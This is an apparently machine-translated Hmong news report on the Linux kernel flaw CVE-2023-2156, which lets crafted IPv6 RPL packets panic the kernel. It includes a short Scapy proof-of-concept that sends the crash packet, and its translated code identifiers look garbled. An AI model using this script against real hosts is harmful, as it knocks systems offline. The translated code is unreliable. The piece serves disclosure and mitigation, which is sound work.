Cov ntsiab lus ntawm qhov tsis tau kho (0-hnub) qhov tsis muaj zog (CVE-2023-2156) hauv lub kernel tau raug tshaj tawm. Linux, uas tso cai rau lub kaw lus kom raug nres los ntawm kev xa cov pob IPv6 tshwj xeeb (packet-of-death). Qhov teeb meem tsuas yog tshwm sim thaum qhib kev txhawb nqa rau Routing Protocol rau Low-Power thiab Lossy Networks (RPL), uas raug kaw los ntawm lub neej ntawd hauv kev faib tawm thiab feem ntau yog siv rau ntawm cov khoom siv embedded ua haujlwm ntawm cov tes hauj lwm wireless nrog cov pob poob siab.
Qhov tsis muaj zog no yog tshwm sim los ntawm kev siv cov ntaub ntawv sab nraud tsis raug hauv RPL protocol parsing code, uas ua rau muaj qhov yuam kev lees paub thiab kernel panic. Thaum cov ntaub ntawv tau los ntawm kev parsing IPv6 RPL packet header raug muab tso rau hauv k_buff (Socket Buffer) qauv, yog tias CmprI teb teeb tsa rau 15, Segleft teb teeb tsa rau 1, thiab CmprE teb teeb tsa rau 0, 48-byte vector nrog cov chaw nyob raug unpacked rau 528 bytes, ua rau tsis muaj lub cim xeeb txaus rau lub buffer. Hauv qhov no, lub skb_push function, siv los tso cov ntaub ntawv rau hauv cov qauv, kuaj xyuas cov ntaub ntawv thiab buffer loj disproportion, ua rau muaj kev ntshai kom tiv thaiv kev sau ntawv dhau ntawm buffer's bounds.
Piv txwv li kev siv tsis raug: # Peb yuav siv Scapy los tsim cov pob ntawv los ntawm scapy.all import * import socket # Siv IPv6 los ntawm koj lub LAN interface DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # Peb siv sockets los xa cov pob ntawv sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Tsim cov pob ntawv # Hom = 3 ua rau qhov no yog pob ntawv RPL # Cov chaw nyob muaj 3 chaw nyob, tab sis vim CmprI yog 15, # txhua octet ntawm ob qhov chaw nyob thawj zaug raug kho raws li qhov chaw nyob compressed # Segleft = 1 los ua rau muaj kev nthuav dav # lastentry = 0xf0 teeb tsa CmprI rau 15 thiab CmprE rau 0 p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(hom=3, chaw nyob = ["a8::", "a7::", "a6::"], segleft = 1, lastenry = 0xf0) # Xa cov pob ntawv phem no sockfd.sendto (bytes (p), (DST_ADDR, 0))
Qhov tseem ceeb, cov neeg tsim khoom kernel tau txais kev ceeb toom txog qhov tsis muaj zog rov qab rau lub Ib Hlis 2022 thiab sim kho nws peb zaug dhau 15 lub hlis dhau los, tso tawm cov kho thaum lub Cuaj Hlis 2022, Lub Kaum Hli 2022, thiab Lub Plaub Hlis 2023. Txawm li cas los xij, txhua zaus, cov kev kho tau ua pov thawj tsis txaus, thiab qhov tsis muaj zog tuaj yeem rov ua dua. Thaum kawg, ZDI project, uas tau koom tes kho qhov tsis muaj zog, tau txiav txim siab los qhia cov ntaub ntawv ntxaws txog qhov tsis muaj zog yam tsis tau tos kom muaj kev kho ua haujlwm hauv kernel.
Yog li ntawd, qhov tsis muaj zog tseem tsis tau kho. Daim kho uas suav nrog hauv kernel 6.4-rc2 kuj tsis ua haujlwm zoo. Cov neeg siv raug qhia kom xyuas kom meej tias RPL protocol tsis tau siv rau ntawm lawv cov system, uas tuaj yeem ua tiav los ntawm kev siv cov lus txib sysctl -a | grep -i rpl_seg_enabled
Tau qhov twg los: opennet.ru
